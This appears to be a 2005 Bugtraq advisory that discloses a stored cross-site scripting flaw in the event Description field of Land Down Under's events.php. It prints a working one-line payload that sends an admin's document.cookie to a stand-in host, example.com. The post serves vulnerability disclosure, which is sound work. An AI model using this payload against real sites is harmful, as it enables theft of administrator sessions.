Land Down Under 'events.php' Cross Site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Land Down Under 'events.php' Cross Site Scripting Vulnerability
From: conor.e.buckley@xxxxxxxxx
Date: 5 Sep 2005 20:11:45 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

In Land Down Under (LDU http://www.neocrome.net/), the target script 
"events.php?m=add" is vulnerable to XSS.

When submitting an event, the "Description" field is vulnerable to HTML 
injection.  Any user logged in can submit an event but an admin must approve of 
the event before being publicly viewed.  Using javascript, an admin's cookie 
can be stolen.

Exploit:
Description:
<script>document.location="http://example.com/script?cookie="+escape(document.cookie)</script>


LDU 801 and earlier are vulnerable.

--------------------------------
conor.e.buckley@xxxxxxxxx
http://quixote.at.preempted.net

Prev by Date: UNB 1.5.3 cross site scripting
Next by Date: SUSE Security Announcement: php4, php5 remote code execution (SUSE-SA:2005:051)
Previous by thread: UNB 1.5.3 cross site scripting
Next by thread: SUSE Security Announcement: php4, php5 remote code execution (SUSE-SA:2005:051)
Index(es):
- Date
- Thread